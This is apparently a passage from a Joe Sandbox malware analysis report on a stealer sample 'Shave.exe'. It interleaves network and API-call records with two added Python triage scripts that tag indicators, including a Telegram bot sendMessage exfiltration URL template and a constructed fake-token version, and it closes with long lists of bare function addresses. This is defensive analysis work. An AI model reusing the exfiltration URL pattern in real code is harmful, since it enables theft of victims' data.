Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2
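The Telegram bot URL template, the reallyfreegeoip lookup keyed on the sandbox's own egress IP, and the paired 443 flows above are the indicators a responder would pull out of this section. The Python below is an added triage example, not part of the Joe Sandbox report and not code from the sample: it takes lines in the report's own format, tags the indicators, extracts token and chat_id from a Telegram bot URL where they are populated (the report's strings have both fields empty; the populated URL in the block is constructed with a fake token), and pairs each ephemeral client port with the TLS server port so sessions can be counted. The tag names and the reading of the search-provider URLs as browser-profile artifacts are this example's own.

```python
"""Triage helpers for the memory strings and flow records in the report.

Added example, not part of the Joe Sandbox report or of the sample.
"""
import re
from collections import Counter
from typing import Optional

# Telegram bot API: https://api.telegram.org/bot<token>/<method>?chat_id=<id>&text=...
# The report's strings carry an empty token and chat_id (filled in at run
# time by the stealer), so both groups are optional.
TELEGRAM_RE = re.compile(
    r"https://api\.telegram\.org/bot(?P<token>[0-9]+:[A-Za-z0-9_-]+)?"
    r"(?:/(?P<method>[A-Za-z]+)\?chat_id=(?P<chat_id>-?[0-9]*))?"
)
# Public-IP geolocation; the report flags it as a country check on the analysis host.
GEOIP_RE = re.compile(r"https://reallyfreegeoip\.org(?:/xml/(?P<ip>[0-9.]*))?")
# Search-provider autocomplete/favicon URLs of the kind Chromium keeps in a
# profile's keywords table; read here (an assumption) as residue of browser
# harvesting rather than as C2.
SEARCH_HOSTS = ("ac.ecosia.org", "cdn.ecosia.org", "www.ecosia.org",
                "ch.search.yahoo.com", "duckduckgo.com", "www.google.com")

FLOW_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(r"HTTPS traffic detected: (\S+):(\d+) -> (\S+):(\d+) version: (.+)$")


def classify_string(s: str) -> Optional[str]:
    """Tag one 'String found in binary or memory' value, or None if uninteresting."""
    if TELEGRAM_RE.search(s):
        return "telegram_c2"
    if GEOIP_RE.search(s):
        return "geoip_check"
    if any(h in s for h in SEARCH_HOSTS):
        return "browser_search_provider"
    return None


def parse_telegram(s: str) -> Optional[dict]:
    """Return token/method/chat_id from a Telegram bot URL (None where the field is empty)."""
    m = TELEGRAM_RE.search(s)
    if not m:
        return None
    return {"token": m.group("token") or None,
            "method": m.group("method"),
            "chat_id": m.group("chat_id") or None}


def triage(lines) -> Counter:
    """Count indicator tags over a batch of report lines."""
    tags = Counter(classify_string(line) for line in lines)
    tags.pop(None, None)
    return tags


def tls_sessions(lines, server_port: int = 443) -> dict:
    """Map each ephemeral client port seen talking to server_port to the flow
    directions observed ('c2s', 's2c') and, where a TLS line names it, the peer."""
    sessions: dict = {}
    for line in lines:
        m = FLOW_RE.search(line)
        if m:
            src, dst = int(m.group(1)), int(m.group(2))
            if dst == server_port:
                sessions.setdefault(src, {"dirs": set(), "peer": None})["dirs"].add("c2s")
            elif src == server_port:
                sessions.setdefault(dst, {"dirs": set(), "peer": None})["dirs"].add("s2c")
            continue
        m = TLS_RE.search(line)
        if m and int(m.group(2)) == server_port:
            port = int(m.group(4))
            sessions.setdefault(port, {"dirs": set(), "peer": None})
            sessions[port]["peer"] = (m.group(1), m.group(5).strip())
    return sessions


# Lines copied from the report's string and network sections.
REPORT_LINES = [
    "String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$",
    "String found in binary or memory: https://duckduckgo.com/ac/?q=",
    "String found in binary or memory: https://www.office.com/",
    "Network traffic detected: HTTP traffic on port 443 -> 49865",
    "Network traffic detected: HTTP traffic on port 49865 -> 443",
    "Network traffic detected: HTTP traffic on port 49777 -> 443",
    "HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2",
]
# Constructed, not from the sample: the shape of a populated exfil URL (fake token).
POPULATED = "https://api.telegram.org/bot1234567890:AAEfakeTOKEN_x-y/sendMessage?chat_id=-1001234&text=hi"

if __name__ == "__main__":
    print(dict(triage(REPORT_LINES)))
    print(parse_telegram(POPULATED))
    print(tls_sessions(REPORT_LINES))
```

A populated token and chat_id, when they do turn up in a dump, are what lets a responder ask Telegram to revoke the bot and correlate other samples that share it; an empty template like the one in this report only tells you the channel.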
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040543E
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
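The two annotated records above list, in call order, the imports each function reaches: the second ends in OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx (ExitWindowsEx needs SeShutdownPrivilege enabled, which is why the privilege adjustment precedes it), and the first writes the clipboard. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses 'Code function' records in the report's format and tags them by ordered API subsequences, gaps allowed, so such records can be triaged without reading each list. The chain names and the chains themselves are this example's own, built from the API lists visible above.

```python
"""Ordered API-chain matching over the report's 'Code function' records.

Added example, not part of the Joe Sandbox report or of the sample.
"""
from typing import Dict, List, Optional, Tuple

# Behaviour chains in the order the APIs must appear. Labels are this
# example's own; the chains are taken from the API lists in the report.
CHAINS: Dict[str, List[str]] = {
    # Enable a privilege on the own token, then ExitWindowsEx
    # (which requires SeShutdownPrivilege to be held).
    "shutdown_reboot_with_privilege": [
        "OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges", "ExitWindowsEx"],
    # Replace clipboard contents: this chain writes, it does not read.
    "clipboard_write": ["OpenClipboard", "EmptyClipboard", "SetClipboardData", "CloseClipboard"],
    # Spawn a worker thread and drop the handle.
    "thread_spawn": ["CreateThread", "CloseHandle"],
    # Resolve %TEMP%, then copy a file.
    "temp_copy": ["GetTempPathW", "CopyFileW"],
}


def is_subsequence(needle: List[str], hay: List[str]) -> bool:
    """True if every element of needle occurs in hay, in order, gaps allowed."""
    it = iter(hay)
    return all(api in it for api in needle)


def parse_code_function(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (address, [apis...]) from a 'Code function:' record, or None if
    the line is not one. Bare-address records yield an empty API list."""
    _, sep, rest = line.partition("Code function: ")
    if not sep:
        return None
    tokens = rest.split()
    apis = [a for a in tokens[1].split(",") if a] if len(tokens) == 3 else []
    return tokens[0], apis


def match_behaviours(line: str) -> Optional[Tuple[str, List[str]]]:
    """Tag one record with every chain it contains as an ordered subsequence."""
    parsed = parse_code_function(line)
    if parsed is None:
        return None
    addr, apis = parsed
    return addr, [name for name, chain in CHAINS.items() if is_subsequence(chain, apis)]


def summarize(lines) -> Dict[str, List[str]]:
    """Address -> matched chain names for every 'Code function' record in lines."""
    out: Dict[str, List[str]] = {}
    for line in lines:
        hit = match_behaviours(line)
        if hit is not None:
            out[hit[0]] = hit[1]
    return out


# The two annotated records from the report plus one bare-address record.
REPORT_RECORDS = [
    r"Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040543E "
    "GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,"
    "SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,"
    "ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,"
    "CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,"
    "CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,"
    "EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,"
    "CloseClipboard, 0_2_0040543E",
    r"Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040336C "
    "EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,"
    "GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,"
    "GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,"
    "SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,"
    "lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,"
    "GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,"
    "ExitWindowsEx,ExitProcess, 0_2_0040336C",
    r"Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015C19B 3_2_0015C19B",
]

if __name__ == "__main__":
    for addr, tags in summarize(REPORT_RECORDS).items():
        print(addr, tags)
```

Subsequence matching rather than adjacency is deliberate: the report's lists interleave the privilege chain with unrelated calls (GetCurrentProcess sits between CloseHandle and OpenProcessToken), and a strict adjacent match would miss it.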
Source: C:\Users\user\Desktop\Shave.exe File created: C:\Windows\resources\0809 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_00404C7B 0_2_00404C7B
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_6F971B63 0_2_6F971B63
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00404C7B 3_2_00404C7B
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015C19B 3_2_0015C19B
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015D278 3_2_0015D278
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00155362 3_2_00155362
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015C468 3_2_0015C468
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015C738 3_2_0015C738
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015E988 3_2_0015E988
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_001569A0 3_2_001569A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_001529E0 3_2_001529E0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015CA08 3_2_0015CA08
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015CCD8 3_2_0015CCD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00159DE0 3_2_00159DE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015CFAC 3_2_0015CFAC
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00156FC8 3_2_00156FC8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015F974 3_2_0015F974
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_0015E97C 3_2_0015E97C
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00153E09 3_2_00153E09
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B081D0 3_2_04B081D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E9D8 3_2_04B0E9D8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B08FB0 3_2_04B08FB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07B78 3_2_04B07B78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C0B7 3_2_04B0C0B7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B038B8 3_2_04B038B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E0B8 3_2_04B0E0B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E0A7 3_2_04B0E0A7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B00498 3_2_04B00498
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06488 3_2_04B06488
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B008F0 3_2_04B008F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C0C8 3_2_04B0C0C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06030 3_2_04B06030
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0BC38 3_2_04B0BC38
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0DC28 3_2_04B0DC28
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0BC2A 3_2_04B0BC2A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0FC18 3_2_04B0FC18
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0DC19 3_2_04B0DC19
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B03007 3_2_04B03007
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B03008 3_2_04B03008
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06478 3_2_04B06478
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B03460 3_2_04B03460
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B03450 3_2_04B03450
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0345F 3_2_04B0345F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B00040 3_2_04B00040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B011A0 3_2_04B011A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01190 3_2_04B01190
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0119F 3_2_04B0119F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B015F7 3_2_04B015F7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B015F8 3_2_04B015F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C9E8 3_2_04B0C9E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B015E8 3_2_04B015E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C9D8 3_2_04B0C9D8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B081C0 3_2_04B081C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E9C8 3_2_04B0E9C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0A938 3_2_04B0A938
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E538 3_2_04B0E538
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0A928 3_2_04B0A928
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C558 3_2_04B0C558
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B00D48 3_2_04B00D48
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0E548 3_2_04B0E548
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0C548 3_2_04B0C548
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01EA7 3_2_04B01EA7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01EA8 3_2_04B01EA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01E98 3_2_04B01E98
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B022F0 3_2_04B022F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0D2F7 3_2_04B0D2F7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0F2F8 3_2_04B0F2F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B022FF 3_2_04B022FF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0F2E7 3_2_04B0F2E7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B04ED0 3_2_04B04ED0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B072C8 3_2_04B072C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B072CA 3_2_04B072CA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B04620 3_2_04B04620
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B04622 3_2_04B04622
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06A18 3_2_04B06A18
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06A07 3_2_04B06A07
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06E70 3_2_04B06E70
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B06E72 3_2_04B06E72
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B04A78 3_2_04B04A78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0CE78 3_2_04B0CE78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0CE67 3_2_04B0CE67
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0EE68 3_2_04B0EE68
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01A50 3_2_04B01A50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0EE57 3_2_04B0EE57
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01A41 3_2_04B01A41
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B01A4F 3_2_04B01A4F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02BB0 3_2_04B02BB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02BA0 3_2_04B02BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B08FA1 3_2_04B08FA1
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0B7A8 3_2_04B0B7A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02BAF 3_2_04B02BAF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0D798 3_2_04B0D798
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0B798 3_2_04B0B798
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B05780 3_2_04B05780
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0D787 3_2_04B0D787
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0F788 3_2_04B0F788
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02FF9 3_2_04B02FF9
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B05BD8 3_2_04B05BD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B05BCA 3_2_04B05BCA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07720 3_2_04B07720
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07722 3_2_04B07722
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B05328 3_2_04B05328
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0B318 3_2_04B0B318
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02300 3_2_04B02300
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0B307 3_2_04B0B307
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0D308 3_2_04B0D308
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07B77 3_2_04B07B77
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B0F778 3_2_04B0F778
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B07B69 3_2_04B07B69
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02757 3_2_04B02757
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02758 3_2_04B02758
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B02749 3_2_04B02749
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36678 3_2_04B36678
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35FD8 3_2_04B35FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3FAB0 3_2_04B3FAB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B356B8 3_2_04B356B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B38CB8 3_2_04B38CB8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B336B8 3_2_04B336B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3E2B8 3_2_04B3E2B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B374BF 3_2_04B374BF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3A4A0 3_2_04B3A4A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3FAA0 3_2_04B3FAA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B38CA9 3_2_04B38CA9
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B356A8 3_2_04B356A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3A498 3_2_04B3A498
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31280 3_2_04B31280
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32488 3_2_04B32488
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3BC88 3_2_04B3BC88
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B348F7 3_2_04B348F7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3B2F8 3_2_04B3B2F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B316FF 3_2_04B316FF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3CAE0 3_2_04B3CAE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3B2E8 3_2_04B3B2E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3CAD1 3_2_04B3CAD1
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B304D0 3_2_04B304D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B374D0 3_2_04B374D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B304C0 3_2_04B304C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B336C8 3_2_04B336C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3E2C8 3_2_04B3E2C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3AE30 3_2_04B3AE30
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39637 3_2_04B39637
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33238 3_2_04B33238
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35228 3_2_04B35228
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3322E 3_2_04B3322E
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3C612 3_2_04B3C612
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3C618 3_2_04B3C618
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3AE1F 3_2_04B3AE1F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3521C 3_2_04B3521C
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3DE00 3_2_04B3DE00
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30006 3_2_04B30006
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36609 3_2_04B36609
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37008 3_2_04B37008
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3D470 3_2_04B3D470
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31270 3_2_04B31270
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34478 3_2_04B34478
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32478 3_2_04B32478
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3BC78 3_2_04B3BC78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37E60 3_2_04B37E60
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3D460 3_2_04B3D460
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34468 3_2_04B34468
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36668 3_2_04B36668
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37E50 3_2_04B37E50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3EC58 3_2_04B3EC58
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30040 3_2_04B30040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3EC4A 3_2_04B3EC4A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39648 3_2_04B39648
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31BA0 3_2_04B31BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3CFA6 3_2_04B3CFA6
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32DA8 3_2_04B32DA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3CFA8 3_2_04B3CFA8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3B7AF 3_2_04B3B7AF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31B91 3_2_04B31B91
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3E790 3_2_04B3E790
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34D98 3_2_04B34D98
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37998 3_2_04B37998
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32D9C 3_2_04B32D9C
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39180 3_2_04B39180
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34D89 3_2_04B34D89
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B37988 3_2_04B37988
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30DF0 3_2_04B30DF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B387F0 3_2_04B387F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3DDF0 3_2_04B3DDF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36FFA 3_2_04B36FFA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31FF8 3_2_04B31FF8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30DE0 3_2_04B30DE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B387E0 3_2_04B387E0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33FE8 3_2_04B33FE8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3F5E8 3_2_04B3F5E8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31FE8 3_2_04B31FE8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39FD0 3_2_04B39FD0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3F5D7 3_2_04B3F5D7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39FD8 3_2_04B39FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33FD8 3_2_04B33FD8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3B7C0 3_2_04B3B7C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35FC7 3_2_04B35FC7
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36B30 3_2_04B36B30
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35B39 3_2_04B35B39
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3D938 3_2_04B3D938
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3F120 3_2_04B3F120
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3D927 3_2_04B3D927
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B38328 3_2_04B38328
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3F111 3_2_04B3F111
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B31710 3_2_04B31710
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39B10 3_2_04B39B10
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B38319 3_2_04B38319
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B32918 3_2_04B32918
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39B0A 3_2_04B39B0A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B34908 3_2_04B34908
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3290E 3_2_04B3290E
